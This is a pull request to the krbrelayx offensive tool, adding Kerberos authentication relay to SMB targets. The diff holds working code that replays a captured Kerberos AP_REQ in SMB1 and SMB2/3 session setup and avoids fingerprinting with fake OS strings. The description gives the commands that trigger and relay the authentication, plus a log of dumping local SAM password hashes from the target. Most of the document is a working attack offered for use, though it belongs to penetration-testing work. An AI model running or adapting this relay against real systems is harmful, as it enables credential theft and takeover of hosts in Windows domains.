### PR TITLE
Add Kerberos relay support for * -> SMB

### DIFF
--- a/krbrelayx.py
+++ b/krbrelayx.py
@@ -71,6 +71,7 @@ def main():
             c.setTargets(targetSystem)
             c.setExeFile(options.e)
             c.setCommand(options.c)
+            c.setAddComputerSMB(None)
             c.setEnumLocalAdmins(options.enum_local_admins)
             c.setEncoding(codec)
             c.setMode(mode)

--- a/lib/clients/smbrelayclient.py
+++ b/lib/clients/smbrelayclient.py
@@ -8,29 +8,25 @@
 #
 # Author:
 #  Alberto Solino (@agsolino)
+#  Hugo VINCENT (@hugow_vincent)
 #
 # Description:
 #  This is the SMB client which initiates the connection to an
 # SMB server and relays the credentials to this server.
 
-import os
-
-from struct import unpack
 from socket import error as socketerror
 from impacket import LOG
 from lib.clients import ProtocolClient
 from impacket.examples.ntlmrelayx.servers.socksserver import KEEP_ALIVE_TIMER
-from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_LOGON_FAILURE
-from impacket.ntlm import NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMAuthChallenge
-from impacket.smb import SMB, NewSMBPacket, SMBCommand, SMBSessionSetupAndX_Extended_Parameters, \
+from impacket.nt_errors import STATUS_SUCCESS
+from impacket.smb import SMB, SMBCommand, SMBSessionSetupAndX_Extended_Parameters, \
     SMBSessionSetupAndX_Extended_Data, SMBSessionSetupAndX_Extended_Response_Data, \
-    SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Parameters
-from impacket.smb3 import SMB3, SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, \
-    SMB2_NEGOTIATE, SMB2Negotiate, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30, SMB2_GLOBAL_CAP_LEASING, \
-    SMB3Packet, SMB2_GLOBAL_CAP_LARGE_MTU, SMB2_GLOBAL_CAP_DIRECTORY_LEASING, SMB2_GLOBAL_CAP_MULTI_CHANNEL, \
-    SMB2_GLOBAL_CAP_PERSISTENT_HANDLES, SMB2_NEGOTIATE_SIGNING_REQUIRED, SMB2Packet,SMB2SessionSetup, SMB2_SESSION_SETUP, STATUS_MORE_PROCESSING_REQUIRED, SMB2SessionSetup_Response
-from impacket.smbconnection import SMBConnection, SMB_DIALECT, SessionError
-from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, TypesMech
+    SMBSessionSetupAndX_Extended_Response_Parameters
+from impacket.smb3 import SMB3, SMB2_NEGOTIATE_SIGNING_ENABLED, SMB2Packet,SMB2SessionSetup, SMB2_SESSION_SETUP
+from impacket.smbconnection import SMBConnection, SessionError
+from binascii import a2b_hex
+from impacket.krb5.kerberosv5 import KerberosError
+from impacket import smb, smb3
 
 PROTOCOL_CLIENT_CLASS = "SMBRelayClient"
 
@@ -39,81 +35,101 @@ class MYSMB(SMB):
         self.extendedSecurity = extendedSecurity
         SMB.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negPacket=negPacket)
 
-    def neg_session(self, negPacket=None):
-        return SMB.neg_session(self, extended_security=self.extendedSecurity, negPacket=negPacket)
+    def kerberos_apreq_login(self, authdata_gssapi):
+
+        flags1, flags2 = self.get_flags()
+        if flags2 & SMB.FLAGS2_UNICODE:
+            self.set_flags(flags2=(flags2 & (flags2 ^ SMB.FLAGS2_UNICODE)))
+
+        sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
+        sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
+        sessionSetup['Data']       = SMBSessionSetupAndX_Extended_Data()
+
+        sessionSetup['Parameters']['MaxBufferSize']        = 61440
+        sessionSetup['Parameters']['MaxMpxCount']          = 2
+        sessionSetup['Parameters']['VcNumber']             = 1
+        sessionSetup['Parameters']['SessionKey']           = 0
+        sessionSetup['Parameters']['Capabilities']         = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE | SMB.CAP_LARGE_READX | SMB.CAP_LARGE_WRITEX
+
+        sessionSetup['Parameters']['SecurityBlobLength']  = len(authdata_gssapi)
+        sessionSetup['Parameters'].getData()
+        sessionSetup['Data']['SecurityBlob']       = authdata_gssapi
+
+        # Fake Data here, don't want to get us fingerprinted
+        sessionSetup['Data']['NativeOS']      = 'Unix'
+        sessionSetup['Data']['NativeLanMan']  = 'Samba'
+
+        smb.addCommand(sessionSetup)
+        self.sendSMB(smb)
+
+        smb = self.recvSMB()
+        if smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX):
+            # We will need to use this uid field for all future requests/responses
+            self._uid = smb['Uid']
+
+            # Now we have to extract the blob to continue the auth process
+            sessionResponse   = SMBCommand(smb['Data'][0])
+            sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
+            sessionData       = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
+            sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
+            sessionData.fromString(sessionResponse['Data'])
+
+            self._action = sessionParameters['Action']
+
+            # restore unicode flag if needed
+            if flags2 & SMB.FLAGS2_UNICODE:
+                self.__flags2 |= SMB.FLAGS2_UNICODE
+
+            return 1
+        else:
+            raise Exception('Error: Could not login successfully')
 
 class MYSMB3(SMB3):
     def __init__(self, remoteName, sessPort = 445, extendedSecurity = True, nmbSession = None, negPacket=None):
         self.extendedSecurity = extendedSecurity
         SMB3.__init__(self,remoteName, remoteName, sess_port = sessPort, session=nmbSession, negSessionResponse=SMB2Packet(negPacket))
 
-    def negotiateSession(self, preferredDialect = None, negSessionResponse = None):
-        # We DON'T want to sign
-        self._Connection['ClientSecurityMode'] = 0
+    def kerberos_apreq_login(self, authdata_gssapi):
+        sessionSetup = SMB2SessionSetup()
 
-        if self.RequireMessageSigning is True:
-            LOG.error('Signing is required, attack won\'t work!')
-            return
+        sessionSetup['SecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED
 
-        self._Connection['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION
-        currentDialect = SMB2_DIALECT_WILDCARD
+        sessionSetup['Flags'] = 0
 
-        # Do we have a negSessionPacket already?
-        if negSessionResponse is not None:
-            # Yes, let's store the dialect answered back
-            negResp = SMB2Negotiate_Response(negSessionResponse['Data'])
-            currentDialect = negResp['DialectRevision']
+        sessionSetup['SecurityBufferLength'] = len(authdata_gssapi)
+        sessionSetup['Buffer']               = authdata_gssapi
 
-        if currentDialect == SMB2_DIALECT_WILDCARD:
-            # Still don't know the chosen dialect, let's send our options
+        packet = self.SMB_PACKET()
+        packet['Command'] = SMB2_SESSION_SETUP
+        packet['Data']    = sessionSetup
 
-            packet = self.SMB_PACKET()
-            packet['Command'] = SMB2_NEGOTIATE
-            negSession = SMB2Negotiate()
+        #Initiate session preauth hash
+        self._Session['PreauthIntegrityHashValue'] = self._Connection['PreauthIntegrityHashValue']
 
-            negSession['SecurityMode'] = self._Connection['ClientSecurityMode']
-            negSession['Capabilities'] = self._Connection['Capabilities']
-            negSession['ClientGuid'] = self.ClientGuid
-            if preferredDialect is not None:
-                negSession['Dialects'] = [preferredDialect]
-            else:
-                negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]
-            negSession['DialectCount'] = len(negSession['Dialects'])
-            packet['Data'] = negSession
-
-            packetID = self.sendSMB(packet)
-            ans = self.recvSMB(packetID)
-            if ans.isValidAnswer(STATUS_SUCCESS):
-                negResp = SMB2Negotiate_Response(ans['Data'])
-
-        self._Connection['MaxTransactSize']   = min(0x100000,negResp['MaxTransactSize'])
-        self._Connection['MaxReadSize']       = min(0x100000,negResp['MaxReadSize'])
-        self._Connection['MaxWriteSize']      = min(0x100000,negResp['MaxWriteSize'])
-        self._Connection['ServerGuid']        = negResp['ServerGuid']
-        self._Connection['GSSNegotiateToken'] = negResp['Buffer']
-        self._Connection['Dialect']           = negResp['DialectRevision']
-        if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED:
-            LOG.error('Signing is required, attack won\'t work!')
-            return
-        if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING:
-            self._Connection['SupportsFileLeasing'] = True
-        if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU:
-            self._Connection['SupportsMultiCredit'] = True
-
-        if self._Connection['Dialect'] == SMB2_DIALECT_30:
-            # Switching to the right packet format
-            self.SMB_PACKET = SMB3Packet
-            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING:
-                self._Connection['SupportsDirectoryLeasing'] = True
-            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL:
-                self._Connection['SupportsMultiChannel'] = True
-            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES:
-                self._Connection['SupportsPersistentHandles'] = True
-            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION:
-                self._Connection['SupportsEncryption'] = True
-
-            self._Connection['ServerCapabilities'] = negResp['Capabilities']
-            self._Connection['ServerSecurityMode'] = negResp['SecurityMode']
+        packetID = self.sendSMB(packet)
+        ans = self.recvSMB(packetID)
+        if ans.isValidAnswer(STATUS_SUCCESS):           
+            self._Session['SessionID']       = ans['SessionID']
+            self._Session['SigningRequired'] = False
+            self._Session['Connection']      = self._NetBIOSSession.get_socket()
+            self._Session['SigningKey']        = ''
+            self._Session['SessionKey']        = ''
+            self._Session['SigningActivated']  = False
+            self._Session['CalculatePreAuthHash'] = False
+            return True
+        else:
+            # We clean the stuff we used in case we want to authenticate again
+            # within the same connection
+            self._Session['UserCredentials']   = ''
+            self._Session['Connection']        = 0
+            self._Session['SessionID']         = 0
+            self._Session['SigningRequired']   = False
+            self._Session['SigningKey']        = ''
+            self._Session['SessionKey']        = ''
+            self._Session['SigningActivated']  = False
+            self._Session['CalculatePreAuthHash'] = False
+            self._Session['PreauthIntegrityHashValue'] = a2b_hex(b'0'*128)
+            raise Exception('Unsuccessful Login')
 
 class SMBRelayClient(ProtocolClient):
     PLUGIN_NAME = "SMB"
@@ -144,7 +160,7 @@ class SMBRelayClient(ProtocolClient):
             self.session.close()
             self.session = None
 
-    def initConnection(self):
+    def initConnection(self, authdata, kdc=None):
         self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, manualNegotiate=True)
                                      #,preferredDialect=SMB_DIALECT)
         if self.serverConfig.smb2support is True:
@@ -169,247 +185,23 @@ class SMBRelayClient(ProtocolClient):
             else:
                 LOG.error('SMBCLient error: %s' % str(e))
             return False
-        if packet[0] == '\xfe':
+        if packet[0:1] == b'\xfe':
             smbClient = MYSMB3(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), negPacket=packet)
         else:
             # Answer is SMB packet, sticking to SMBv1
             smbClient = MYSMB(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), negPacket=packet)
 
+        try:
+            smbClient.kerberos_apreq_login(authdata["krbauth"])
+        except (smb.SessionError, smb3.SessionError) as e:
+            raise SessionError(e.get_error_code(), e.get_error_packet())
+        except KerberosError as e:
+            raise e
+        
+        if smbClient.is_signing_required():
+            LOG.error("The Attack won't work, the target server enforce signing.")
+            return False
+
         self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort,
                                      existingConnection=smbClient, manualNegotiate=True)
-
         return True
-
-    def setUid(self,uid):
-        self._uid = uid
-
-    def sendNegotiate(self, negotiateMessage):
-        negotiate = NTLMAuthNegotiate()
-        negotiate.fromString(negotiateMessage)
-        #Remove the signing flag
-        negotiate['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
-
-        challenge = NTLMAuthChallenge()
-        if self.session.getDialect() == SMB_DIALECT:
-            challenge.fromString(self.sendNegotiatev1(negotiateMessage))
-        else:
-            challenge.fromString(self.sendNegotiatev2(negotiateMessage))
-
-        # Store the Challenge in our session data dict. It will be used by the SMB Proxy
-        self.sessionData['CHALLENGE_MESSAGE'] = challenge
-
-        return challenge
-
-    def sendNegotiatev2(self, negotiateMessage):
-        v2client = self.session.getSMBServer()
-
-        sessionSetup = SMB2SessionSetup()
-        sessionSetup['Flags'] = 0
-
-        # Let's build a NegTokenInit with the NTLMSSP
-        blob = SPNEGO_NegTokenInit()
-
-        # NTLMSSP
-        blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
-        blob['MechToken'] = str(negotiateMessage)
-
-        sessionSetup['SecurityBufferLength'] = len(blob)
-        sessionSetup['Buffer'] = blob.getData()
-
-        packet = v2client.SMB_PACKET()
-        packet['Command'] = SMB2_SESSION_SETUP
-        packet['Data'] = sessionSetup
-
-        packetID = v2client.sendSMB(packet)
-        ans = v2client.recvSMB(packetID)
-        if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED):
-            v2client._Session['SessionID'] = ans['SessionID']
-            sessionSetupResponse = SMB2SessionSetup_Response(ans['Data'])
-            respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer'])
-            return respToken['ResponseToken']
-
-        return False
-
-    def sendNegotiatev1(self, negotiateMessage):
-        v1client = self.session.getSMBServer()
-
-        smb = NewSMBPacket()
-        smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
-        smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
-        # Are we required to sign SMB? If so we do it, if not we skip it
-        if v1client.is_signing_required():
-           smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
-
-
-        sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
-        sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
-        sessionSetup['Data']       = SMBSessionSetupAndX_Extended_Data()
-
-        sessionSetup['Parameters']['MaxBufferSize']        = 65535
-        sessionSetup['Parameters']['MaxMpxCount']          = 2
-        sessionSetup['Parameters']['VcNumber']             = 1
-        sessionSetup['Parameters']['SessionKey']           = 0
-        sessionSetup['Parameters']['Capabilities']         = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
-
-        # Let's build a NegTokenInit with the NTLMSSP
-        # TODO: In the future we should be able to choose different providers
-
-        blob = SPNEGO_NegTokenInit()
-
-        # NTLMSSP
-        blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
-        blob['MechToken'] = str(negotiateMessage)
-
-        sessionSetup['Parameters']['SecurityBlobLength']  = len(blob)
-        sessionSetup['Parameters'].getData()
-        sessionSetup['Data']['SecurityBlob']       = blob.getData()
-
-        # Fake Data here, don't want to get us fingerprinted
-        sessionSetup['Data']['NativeOS']      = 'Unix'
-        sessionSetup['Data']['NativeLanMan']  = 'Samba'
-
-        smb.addCommand(sessionSetup)
-        v1client.sendSMB(smb)
-        smb = v1client.recvSMB()
-
-        try:
-            smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
-        except Exception:
-            LOG.error("SessionSetup Error!")
-            raise
-        else:
-            # We will need to use this uid field for all future requests/responses
-            v1client.set_uid(smb['Uid'])
-
-            # Now we have to extract the blob to continue the auth process
-            sessionResponse   = SMBCommand(smb['Data'][0])
-            sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
-            sessionData       = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
-            sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
-            sessionData.fromString(sessionResponse['Data'])
-            respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
-
-            return respToken['ResponseToken']
-
-    def sendStandardSecurityAuth(self, sessionSetupData):
-        v1client = self.session.getSMBServer()
-        flags2 = v1client.get_flags()[1]
-        v1client.set_flags(flags2=flags2 & (~SMB.FLAGS2_EXTENDED_SECURITY))
-        if sessionSetupData['Account'] != '':
-            smb = NewSMBPacket()
-            smb['Flags1'] = 8
-
-            sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
-            sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
-            sessionSetup['Data'] = SMBSessionSetupAndX_Data()
-
-            sessionSetup['Parameters']['MaxBuffer'] = 65535
-            sessionSetup['Parameters']['MaxMpxCount'] = 2
-            sessionSetup['Parameters']['VCNumber'] = os.getpid()
-            sessionSetup['Parameters']['SessionKey'] = v1client._dialects_parameters['SessionKey']
-            sessionSetup['Parameters']['AnsiPwdLength'] = len(sessionSetupData['AnsiPwd'])
-            sessionSetup['Parameters']['UnicodePwdLength'] = len(sessionSetupData['UnicodePwd'])
-            sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
-
-            sessionSetup['Data']['AnsiPwd'] = sessionSetupData['AnsiPwd']
-            sessionSetup['Data']['UnicodePwd'] = sessionSetupData['UnicodePwd']
-            sessionSetup['Data']['Account'] = str(sessionSetupData['Account'])
-            sessionSetup['Data']['PrimaryDomain'] = str(sessionSetupData['PrimaryDomain'])
-            sessionSetup['Data']['NativeOS'] = 'Unix'
-            sessionSetup['Data']['NativeLanMan'] = 'Samba'
-
-            smb.addCommand(sessionSetup)
-
-            v1client.sendSMB(smb)
-            smb = v1client.recvSMB()
-            try:
-                smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
-            except:
-                return None, STATUS_LOGON_FAILURE
-            else:
-                v1client.set_uid(smb['Uid'])
-                return smb, STATUS_SUCCESS
-        else:
-            # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
-            clientResponse = None
-            errorCode = STATUS_ACCESS_DENIED
-
-        return clientResponse, errorCode
-
-    def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
-        if unpack('B', str(authenticateMessageBlob)[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
-            # We need to wrap the NTLMSSP into SPNEGO
-            respToken2 = SPNEGO_NegTokenResp()
-            respToken2['ResponseToken'] = str(authenticateMessageBlob)
-            authData = respToken2.getData()
-        else:
-            authData = str(authenticateMessageBlob)
-
-        if self.session.getDialect() == SMB_DIALECT:
-            token, errorCode = self.sendAuthv1(authData, serverChallenge)
-        else:
-            token, errorCode = self.sendAuthv2(authData, serverChallenge)
-        return token, errorCode
-
-    def sendAuthv2(self, authenticateMessageBlob, serverChallenge=None):
-        v2client = self.session.getSMBServer()
-
-        sessionSetup = SMB2SessionSetup()
-        sessionSetup['Flags'] = 0
-
-        packet = v2client.SMB_PACKET()
-        packet['Command'] = SMB2_SESSION_SETUP
-        packet['Data']    = sessionSetup
-
-        # Reusing the previous structure
-        sessionSetup['SecurityBufferLength'] = len(authenticateMessageBlob)
-        sessionSetup['Buffer'] = authenticateMessageBlob
-
-        packetID = v2client.sendSMB(packet)
-        packet = v2client.recvSMB(packetID)
-
-        return packet, packet['Status']
-
-    def sendAuthv1(self, authenticateMessageBlob, serverChallenge=None):
-        v1client = self.session.getSMBServer()
-
-        smb = NewSMBPacket()
-        smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
-        smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
-        # Are we required to sign SMB? If so we do it, if not we skip it
-        if v1client.is_signing_required():
-           smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
-        smb['Uid'] = v1client.get_uid()
-
-        sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
-        sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
-        sessionSetup['Data']       = SMBSessionSetupAndX_Extended_Data()
-
-        sessionSetup['Parameters']['MaxBufferSize']        = 65535
-        sessionSetup['Parameters']['MaxMpxCount']          = 2
-        sessionSetup['Parameters']['VcNumber']             = 1
-        sessionSetup['Parameters']['SessionKey']           = 0
-        sessionSetup['Parameters']['Capabilities']         = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
-
-        # Fake Data here, don't want to get us fingerprinted
-        sessionSetup['Data']['NativeOS']      = 'Unix'
-        sessionSetup['Data']['NativeLanMan']  = 'Samba'
-
-        sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
-        sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
-        smb.addCommand(sessionSetup)
-        v1client.sendSMB(smb)
-
-        smb = v1client.recvSMB()
-
-        errorCode = smb['ErrorCode'] << 16
-        errorCode += smb['_reserved'] << 8
-        errorCode += smb['ErrorClass']
-
-        return smb, errorCode
-
-    def getStandardSecurityChallenge(self):
-        if self.session.getDialect() == SMB_DIALECT:
-            return self.session.getSMBServer().get_encryption_key()
-        else:
-            return None

--- a/lib/servers/smbrelayserver.py
+++ b/lib/servers/smbrelayserver.py
@@ -575,7 +575,8 @@ class SMBRelayServer(Thread):
             if host.lower() in parsed_target.hostname.lower():
                 # Found a target with the same SPN
                 client = self.config.protocolClients[target.scheme.upper()](self.config, parsed_target)
-                client.initConnection(authdata, self.config.dcip)
+                if not client.initConnection(authdata, self.config.dcip):
+                    return
                 # We have an attack.. go for it
                 attack = self.config.attacks[parsed_target.scheme.upper()]
                 client_thread = attack(self.config, client.session, self.authUser)


### PR DESCRIPTION
Hi @dirkjanm, as discussed here is my implementation for relaying all protocols to SMB. 

First trigger the authentication:
```
$ smbclient.py -dc-ip 10.42.0.5 -target-ip 127.0.0.1 -k -no-pass "DEV.LOCAL/adminuser@bast01.dev.local"
```

Then relay:
```
$ python3 krbrelayx.py -t smb://bast01.dev.local
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 127.0.0.1
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x156a35f4f55f1455cc86052ac65cbaf9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done dumping SAM hashes for host: bast01.dev.local
[*] Stopping service RemoteRegistry

```

I took the code from impacket for the kerberos authentication part from an `AP_REQ` you can compare it:
- https://github.com/fortra/impacket/blob/af51dfd1e0bf4472200b4a2d560cd70df7904f9c/impacket/smb.py#L3148
- https://github.com/fortra/impacket/blob/af51dfd1e0bf4472200b4a2d560cd70df7904f9c/impacket/smb3.py#L692

I've implemented it for SMB1 and SMB2/3 however I did not test this against SMBv1.